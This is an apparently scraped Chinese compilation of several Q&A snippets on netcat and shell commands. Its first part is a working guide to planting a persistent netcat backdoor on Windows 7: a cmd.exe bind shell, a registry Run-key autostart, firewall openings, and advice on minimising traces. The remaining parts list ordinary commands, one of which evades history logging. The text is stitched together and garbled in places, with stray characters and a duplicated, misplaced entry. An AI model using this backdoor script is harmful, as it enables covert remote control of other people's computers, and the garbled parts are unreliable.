⑴ 如何在Windows,linux中安裝後門
0×00 准備工作
假設用戶以管理員許可權登錄系統,在Windows 7系統上使用netcat 創建一個後門。
Netcat 功能比較單一, 缺少了許多我們滲透工作中需要的功能。為此我們將創建一個攜帶型的工具包來解決這個問題 :
1.下載額外的文件和附加持續.
2.編輯修改指定文件.
3.快速創建執行後門.
4.控制遠程伺服器並進行惡作劇 :)
為了便於你第一時間獲取到你的工具包,你需要將它放置在一個獨立的U盤或者在線伺服器上。
攜帶型工具(Portable Applications)
攜帶型工具是那些不需要安裝就能直接使用的程序,它們往往將所有的執行環境和核心程序本身一同打包成一個獨立的文件,方便攜帶。在獨立文件執行的過程中會自行釋放額的需求文件,並構建一個可順利執行目標程序的環境。
1.不依賴特定的dll(dll已經打包)
2.不依賴注冊表設置(有可能自行初始化) ,不遺留下任何注冊表操作痕跡
3.操作痕跡最小化,盡量避免一切不必要的操作,導致留下過多的系統操作記錄
創建 Windows 7 工具集
gVim (跨平台的文本編輯器, 提供強大的命令行操作交互)
Wget (下載 windows 64 位版本)
Netcat
有Kali系統的可以用命令 「find / -name nc.exe」搜索到 http://www.kali.org/ 或者下載已經編譯好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初試 Netcat 後門
nc.exe -dLp 449 -e cmd.exe -L 這個選項會開啟一個監聽服務並等待客戶端連接, 在客戶端連接成功之後,會提供相應的交互服務。
– p 指定程序監聽的埠(非管理員許可權只能設置高於1024的埠. 同時不可復用現有埠)
– e 在接收到一個客戶端連接後, 會執行一個特定的程序(這里是cmd.exe), 這個程序負責接下來的會話交互(執行客戶端後期提交的任何命令)
– d 採取靜默監聽模式,避免nc運行過程中,產生過多額外的日誌信息
Windows 7 後門安裝批處理腳本
@echo off
Rem 拷貝文件到系統目錄
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注冊表,增加後門自啟動代碼.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火牆規則,開放監聽的449埠,允許外部連接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火牆規則,允許nc.exe對外提供連接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
⑵ 什麼是Linux系統中nc命令
Linux中nc命令是一個功能強大的網路工具,全稱是netcat。
測試使用
在一個終端上 輸入內 nc -lk 9999
輸入數據。。。
新開容啟一個終端
輸入 nc ip:9999
就可以看到上一個終端輸入的數據
⑶ linux怎麼安裝netcat
下載
下載的是netcat-0.7.1.tar.gz版本,存放在當前目錄下
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/
解壓
將 netcat-0.7.1.tar.gz 解壓到 /usr/local 目錄下
tar -zxvf netcat-0.7.1.tar.gz -C /usr/local
重命名
切換到 /usr/local 目錄下:cd /usr/local
改名:mv netcat-0.7.1 netcat
配置
切換目錄:cd /usr/local/netcat
把文件配置到 /opt/netcat 下,卸載軟體時,只要刪除這個文件就行了:./configure –prefix=/opt/netcat
編譯安裝
編譯:make
安裝:make install
配置環境變數 vim /etc/profile添加以下內容:# set netcat
pathexport NETCAT_HOME=/opt/netcatexport
PATH=$PATH:$NETCAT_HOME/bin保存,退出,並使配置生效:source /etc/profile
驗證nc –help
⑷ 如何屏蔽linux操作系統指紋信息被掃描
linux下有個nc命令(即netcat),是用於埠掃描的。 到下面網址下載nc的源代碼,自己分析一下吧。
⑸ Linux shell常用命令
Linux shell常用命令匯總
對於經常使用linux系統的博主岩罩來說,基本常用的shell命令是少不了的,下面為大家總結了Linux shell的常用命令,希望對大家有所幫寬棗租助!
1.檢查遠程埠是否對bash開放:
echo >/dev/tcp/8.8.8.8/53 && echo "open"
2.讓進程轉入後台慎兆:
Ctrl + z
3、將進程轉到前台:
fg
4.產生隨機的十六進制數,其中n是字元數:
openssl rand -hex n
5.在當前shell里執行一個文件里的命令:
source /home/user/file.name
6.截取前5個字元:
${variable:0:5}
7.SSH debug 模式:
ssh -vvv user@ip_address
8.SSH with pem key:
ssh user@ip_address -i key.pem
9.用wget抓取完整的網站目錄結構,存放到本地目錄中:
wget -r --no-parent --reject "index.html*" http://hostname/ -P /home/user/dirs
10.一次創建多個目錄:
mkdir -p /home/user/{test,test1,test2}
11.列出包括子進程的進程樹:
ps axwef
12.創建 war 文件:
jar -cvf name.war file
13.測試硬碟寫入速度:
dd if=/dev/zero of=/tmp/output.img bs=8k count=256k; rm -rf /tmp/output.img
14.測試硬碟讀取速度:
hdparm -Tt /dev/sda
15.獲取文本的md5 hash:
echo -n "text" | md5sum
16.檢查xml格式:
xmllint --noout file.xml
17.將tar.gz提取到新目錄里:
tar zxvf package.tar.gz -C new_dir
18.使用curl獲取HTTP頭信息:
curl -I http://www.example.com
19.修改文件或目錄的時間戳(YYMMDDhhmm):
touch -t 0712250000 file
20.用wget命令執行ftp下載:
wget -m ftp://username:password@hostname
21.生成隨機密碼(例子里是16個字元長):
LANG=c < /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
22.快速備份一個文件:
cp some_file_name{,.bkp}
23.訪問Windows共享目錄:
smbclient -U "DOMAIN\user" //dc.domain.com/share/test/dir
24.執行歷史記錄里的命令(這里是第100行):
!100
25.解壓:
unzip package_name.zip -d dir_name
26.輸入多行文字(CTRL + d 退出):
cat > test.txt
27.創建空文件或清空一個現有文件:
\> test.txt
28.與Ubuntu NTP server同步時間:
ntpdate ntp.ubuntu.com
29.用netstat顯示所有tcp4監聽埠:
netstat -lnt4 | awk '{print $4}' | cut -f2 -d: | grep -o '[0-9]*'
30.qcow2鏡像文件轉換:
qemu-img convert -f qcow2 -O raw precise-server-cloudimg-amd64-disk1.img \precise-server-cloudimg-amd64-disk1.raw
31.重復運行文件,顯示其輸出(預設是2秒一次):
watch ps -ef
32.所有用戶列表:
getent passwd
33.Mount root in read/write mode:
mount -o remount,rw /
34.掛載一個目錄(這是不能使用鏈接的情況):
mount --bind /source /destination
35.動態更新DNS server:
nsupdate < <eof p=""> </eof>
update add $HOST 86400 A $IP
send
EOF
36.遞歸grep所有目錄:
grep -r "some_text" /path/to/dir
37.列出前10個最大的文件:
lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB "$9 }' | sort -n -u | tail
39.打開Vim並跳到文件末:
vim + some_file_name
40.Git 克隆指定分支(master):
git clone [email protected]:name/app.git -b master
41.Git 切換到其它分支(develop):
git checkout develop
42.Git 刪除分支(myfeature):
git branch -d myfeature
43.Git 刪除遠程分支
git push origin :branchName
44.Git 將新分支推送到遠程伺服器:
git push -u origin mynewfeature
45.列印歷史記錄中最後一次cat命令:
!cat:p
46.運行歷史記錄里最後一次cat命令:
!cat
47.找出/home/user下所有空子目錄:
echo >/dev/tcp/8.8.8.8/53 && echo "open"
1.檢查遠程埠是否對bash開放:
find /home/user -maxdepth 1 -type d -empty
48.獲取test.txt文件中第50-60行內容:
< test.txt sed -n '50,60p'
49.運行最後一個命令(如果最後一個命令是mkdir /root/test, 下面將會運行: sudo mkdir /root/test):
sudo !!
50.創建臨時RAM文件系統 – ramdisk (先創建/tmpram目錄):
mount -t tmpfs tmpfs /tmpram -o size=512m
51.Grep whole words:
grep -w "name" test.txt
52.在需要提升許可權的.情況下往一個文件里追加文本:
echo "some text" | sudo tee -a /path/file
53.列出所有kill signal參數:
kill -l
54.在bash歷史記錄里禁止記錄最後一次會話:
kill -9 $$
55.掃描網路尋找開放的埠:
nmap -p 8081 172.20.0.0/16
56.設置git email:
git config --global user.email "[email protected]"
57.To sync with master if you have unpublished commits:
git pull --rebase origin master
58.將所有文件名中含有”txt”的文件移入/home/user目錄:
find -iname "*txt*" -exec mv -v {} /home/user \;
59.將文件按行並列顯示:
paste test.txt test1.txt
60.shell里的進度條:
pv data.log
61.使用netcat將數據發送到Graphite server:
echo "hosts.sampleHost 10 `date +%s`" | nc 192.168.200.2 3000
62.將tabs轉換成空格:
expand test.txt > test1.txt
63.Skip bash history:
< space >cmd
64.去之前的工作目錄:
cd -
65.拆分大體積的tar.gz文件(每個100MB),然後合並回去:
split –b 100m /path/to/large/archive /path/to/output/files
cat files* > archive
66.使用curl獲取HTTP status code:
curl -sL -w "%{http_code}\\n" www.example.com -o /dev/null
67.設置root密碼,強化MySQL安全安裝:
/usr/bin/mysql_secure_installation
68.當Ctrl + c不好使時:
Ctrl + \
69.獲取文件owner:
stat -c %U file.txt
70.block設備列表:
lsblk -f
71.找出文件名結尾有空格的文件:
find . -type f -exec egrep -l " +$" {} \;
72.找出文件名有tab縮進符的文件
find . -type f -exec egrep -l $'\t' {} \;
73.用”=”列印出橫線:全選復制放進筆記
printf '%100s\n' | tr ' ' = ;